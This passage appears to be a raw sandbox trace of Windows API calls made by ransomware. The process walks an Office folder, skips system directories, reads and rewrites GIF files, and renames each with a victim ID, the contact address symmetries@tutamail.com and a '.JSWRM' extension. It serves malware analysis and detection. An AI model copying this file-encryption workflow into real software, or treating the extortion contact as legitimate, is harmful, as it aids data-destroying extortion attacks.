lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR8B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0120.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0120.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0120.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR8B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir8b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.823] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4152) returned 1 [0120.823] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1030) returned 0x24e1d8 [0120.823] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1030, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1030, lpOverlapped=0x0) returned 1 [0120.825] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.825] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1030, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1030, lpOverlapped=0x0) returned 1 [0120.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.825] CloseHandle (hObject=0x314) returned 1 [0120.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0120.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0120.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0120.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0120.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0120.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0120.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.826] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR8B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir8b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR8B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir8b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0120.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0120.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0120.842] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d54, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR8F.GIF", cAlternateFileName="")) returned 1 [0120.842] lstrcmpiW (lpString1="ZPDIR8F.GIF", lpString2=".") returned 1 [0120.842] lstrcmpiW (lpString1="ZPDIR8F.GIF", lpString2="..") returned 1 [0120.842] lstrcmpiW (lpString1="ZPDIR8F.GIF", lpString2="...") returned 1 [0120.842] lstrcmpiW (lpString1="ZPDIR8F.GIF", lpString2="windows") returned 1 [0120.842] lstrcmpiW (lpString1="ZPDIR8F.GIF", lpString2="recovery") returned 1 [0120.842] lstrcmpiW (lpString1="ZPDIR8F.GIF", lpString2="perflogs") returned 1 [0120.842] lstrcmpiW (lpString1="ZPDIR8F.GIF", lpString2="documents and settings") returned 1 [0120.842] lstrcmpiW (lpString1="ZPDIR8F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.842] lstrcmpiW (lpString1="ZPDIR8F.GIF", lpString2="system volume information") returned 1 [0120.842] lstrcmpiW (lpString1="ZPDIR8F.GIF", lpString2="msocache") returned 1 [0120.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0120.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR8F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR8F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR8F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0120.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0120.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR8F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR8F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR8F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0120.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0120.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0120.843] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR8F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir8f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.843] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=11604) returned 1 [0120.844] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24e1d8 [0120.844] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2d50, lpOverlapped=0x0) returned 1 [0120.846] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.846] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2d50, lpOverlapped=0x0) returned 1 [0120.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.846] CloseHandle (hObject=0x314) returned 1 [0120.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0120.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0120.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0120.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0120.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0120.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.847] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR8F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir8f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR8F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir8f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0120.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0120.848] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3e39, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR9B.GIF", cAlternateFileName="")) returned 1 [0120.848] lstrcmpiW (lpString1="ZPDIR9B.GIF", lpString2=".") returned 1 [0120.848] lstrcmpiW (lpString1="ZPDIR9B.GIF", lpString2="..") returned 1 [0120.848] lstrcmpiW (lpString1="ZPDIR9B.GIF", lpString2="...") returned 1 [0120.848] lstrcmpiW (lpString1="ZPDIR9B.GIF", lpString2="windows") returned 1 [0120.848] lstrcmpiW (lpString1="ZPDIR9B.GIF", lpString2="recovery") returned 1 [0120.848] lstrcmpiW (lpString1="ZPDIR9B.GIF", lpString2="perflogs") returned 1 [0120.848] lstrcmpiW (lpString1="ZPDIR9B.GIF", lpString2="documents and settings") returned 1 [0120.848] lstrcmpiW (lpString1="ZPDIR9B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.848] lstrcmpiW (lpString1="ZPDIR9B.GIF", lpString2="system volume information") returned 1 [0120.848] lstrcmpiW (lpString1="ZPDIR9B.GIF", lpString2="msocache") returned 1 [0120.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0120.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR9B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR9B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR9B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0120.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0120.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR9B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR9B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR9B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0120.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0120.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0120.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0120.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR9B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir9b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.849] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=15929) returned 1 [0120.849] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3e30) returned 0x24e1d8 [0120.849] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x3e30, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x3e30, lpOverlapped=0x0) returned 1 [0120.853] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.853] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x3e30, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x3e30, lpOverlapped=0x0) returned 1 [0120.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.853] CloseHandle (hObject=0x314) returned 1 [0120.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0120.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0120.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0120.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0120.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0120.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0120.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.854] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR9B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir9b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR9B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir9b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0120.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0120.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0120.854] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x46ec, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR9F.GIF", cAlternateFileName="")) returned 1 [0120.855] lstrcmpiW (lpString1="ZPDIR9F.GIF", lpString2=".") returned 1 [0120.855] lstrcmpiW (lpString1="ZPDIR9F.GIF", lpString2="..") returned 1 [0120.855] lstrcmpiW (lpString1="ZPDIR9F.GIF", lpString2="...") returned 1 [0120.855] lstrcmpiW (lpString1="ZPDIR9F.GIF", lpString2="windows") returned 1 [0120.855] lstrcmpiW (lpString1="ZPDIR9F.GIF", lpString2="recovery") returned 1 [0120.855] lstrcmpiW (lpString1="ZPDIR9F.GIF", lpString2="perflogs") returned 1 [0120.855] lstrcmpiW (lpString1="ZPDIR9F.GIF", lpString2="documents and settings") returned 1 [0120.855] lstrcmpiW (lpString1="ZPDIR9F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.855] lstrcmpiW (lpString1="ZPDIR9F.GIF", lpString2="system volume information") returned 1 [0120.855] lstrcmpiW (lpString1="ZPDIR9F.GIF", lpString2="msocache") returned 1 [0120.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR9F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR9F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR9F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0120.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR9F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR9F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR9F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0120.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0120.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0120.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0120.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR9F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir9f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.856] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: 